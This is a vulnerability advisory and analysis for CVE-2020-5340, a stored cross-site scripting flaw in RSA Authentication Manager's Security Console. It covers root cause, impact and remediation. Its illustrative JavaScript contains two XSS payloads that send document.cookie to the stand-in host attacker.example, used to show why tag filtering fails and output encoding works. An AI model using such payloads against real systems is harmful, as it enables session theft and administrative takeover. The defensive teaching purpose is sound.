CVE-2020-5340 in RSA Authentication Manager
Summary
by MITRE
RSA Authentication Manager versions prior to 8.4 P10 contain a stored cross-site scripting vulnerability in the Security Console. A malicious RSA Authentication Manager Security Console administrator with advanced privileges could exploit this vulnerability to store arbitrary HTML or JavaScript code through the Security Console web interface. When other Security Console administrators attempt to change the default security domain mapping, the injected scripts could potentially be executed in their browser.
Analysis
by VulDB Data Team • 05/10/2025
CVE-2020-5340 is a stored cross-site scripting flaw in RSA Authentication Manager versions earlier than 8.4 Patch 10. It sits in the Security Console, the web interface through which administrators manage authentication policies, users and security domains. As with any stored XSS, the root cause is that a value supplied by one user is persisted and later rendered into the web interface without adequate input validation and output encoding, so markup in the stored value is interpreted by the viewing browser instead of being displayed as text. The affected functionality is the default security domain mapping page, where administrators edit the association between security domains.
Exploitation requires an attacker who already holds a Security Console administrator account with advanced privileges; the flaw is not reachable by unauthenticated users or by end users of the authentication service. The malicious administrator submits HTML or JavaScript through the Security Console, and the payload is stored server-side with the security domain configuration. When another administrator later opens the default security domain mapping page, the stored payload is rendered into the page and executes in that administrator's browser, inside their authenticated Security Console session. Because the script runs with the same origin as the console, any request it makes carries the victim's session and is treated by the console as the victim's own action.
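As an added example (illustrative code, not RSA Authentication Manager's implementation), the snippet below shows how a stored value reaches the mapping page in a vulnerable renderer, why a blocklist-style input filter is not a fix, and how output encoding closes the hole. The field name (a security domain's display name), the form layout, the payloads and the list of tags the template emits are all assumptions made for the example.

```javascript
// Added example for CVE-2020-5340's vulnerability class (stored XSS in an
// admin console). Not RSA's code; field names, form layout and payloads are
// assumptions chosen to illustrate the mechanism.

// Context-aware HTML encoding for text nodes and double-quoted attribute values.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Inadequate input "validation": strips <script> tags on the way in and
// nothing else. Shown here only to demonstrate that it is insufficient.
function naiveSanitize(value) {
  return String(value).replace(/<\/?script\b[^>]*>/gi, "");
}

// Vulnerable: the stored name is concatenated into the mapping page as-is,
// once in a table cell and once prefilled into an <input> for editing.
function renderMappingVulnerable(domain) {
  return `<tr><td>${domain.name}</td>` +
         `<td><input name="domain" value="${domain.name}"></td></tr>`;
}

// Hardened: the untrusted value is HTML-encoded at output time for both
// contexts, so the same stored payload is displayed as literal text.
function renderMappingSafe(domain) {
  const safe = escapeHtml(domain.name);
  return `<tr><td>${safe}</td>` +
         `<td><input name="domain" value="${safe}"></td></tr>`;
}

// Check used below: does the markup contain an element the template never
// emits (template tags are tr, td, input) or an inline on* event handler on
// any element? Attributes are parsed per tag so that an encoded quote inside
// a value is not mistaken for an attribute boundary.
function hasInjectedActiveContent(html) {
  const allowedTags = new Set(["tr", "td", "input"]);
  for (const tag of html.matchAll(/<\s*\/?([a-z][a-z0-9]*)([^>]*)>/gi)) {
    if (!allowedTags.has(tag[1].toLowerCase())) return true;
    const attrs = tag[2].matchAll(/([^\s"'=<>\/]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?/g);
    for (const attr of attrs) {
      if (/^on/i.test(attr[1])) return true;
    }
  }
  return false;
}

// Constructed payloads a malicious administrator could store as a domain name.
// 1) Classic script element, caught by the naive filter.
const scriptPayload = {
  name: '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>',
};
// 2) Attribute breakout: no <script> tag at all, so the naive filter leaves it
//    intact, yet it escapes value="..." and adds an autofocus event handler.
const attributePayload = {
  name: '" autofocus onfocus="new Image().src=\'https://attacker.example/?c=\'+document.cookie',
};

// For one stored value, report whether active content survives in each variant.
function demo(domain) {
  const filtered = { name: naiveSanitize(domain.name) };
  return {
    vulnerable: hasInjectedActiveContent(renderMappingVulnerable(domain)),
    naiveFilterOnly: hasInjectedActiveContent(renderMappingVulnerable(filtered)),
    encoded: hasInjectedActiveContent(renderMappingSafe(domain)),
  };
}

console.log(demo(scriptPayload));     // vulnerable: true, naiveFilterOnly: false, encoded: false
console.log(demo(attributePayload));  // vulnerable: true, naiveFilterOnly: true,  encoded: false
```

The second payload is the point of the example: a filter that only removes script tags stops the first payload but not the attribute breakout, whereas encoding at output time neutralizes both without any knowledge of what an attacker might send. A real fix also encodes for the specific context (JavaScript strings, URLs, CSS) wherever a stored value lands in something other than HTML text or a quoted attribute.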
The impact is therefore lateral movement between administrators and, where the victim holds a higher role than the attacker, privilege escalation: the injected script can drive administrative functions on the victim's behalf, for example changing authentication policies or user access rights. Session cookies can be read directly by the script only if they are not flagged HttpOnly, but the script does not need the cookie value to act, since the browser attaches it to every request the script issues. Organizations in which several administrators with different privilege levels share the Security Console are most exposed, because a single stored payload affects every administrator who views the affected page until the stored value is removed.
Upgrade RSA Authentication Manager to 8.4 Patch 10 or later, which corrects the input validation and output encoding of the affected page. Until the upgrade is applied, and as a general control, keep the number of accounts holding advanced Security Console privileges to a minimum, and review administrative change records for security domain objects whose stored values contain HTML markup, which would indicate an injection attempt by an existing administrator. The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation). VulDB maps it to ATT&CK technique T1078 (Valid Accounts), reflecting that exploitation requires an already-authenticated administrative account rather than an external foothold. Organizations should also confirm that administrative access to the Security Console is restricted to essential personnel.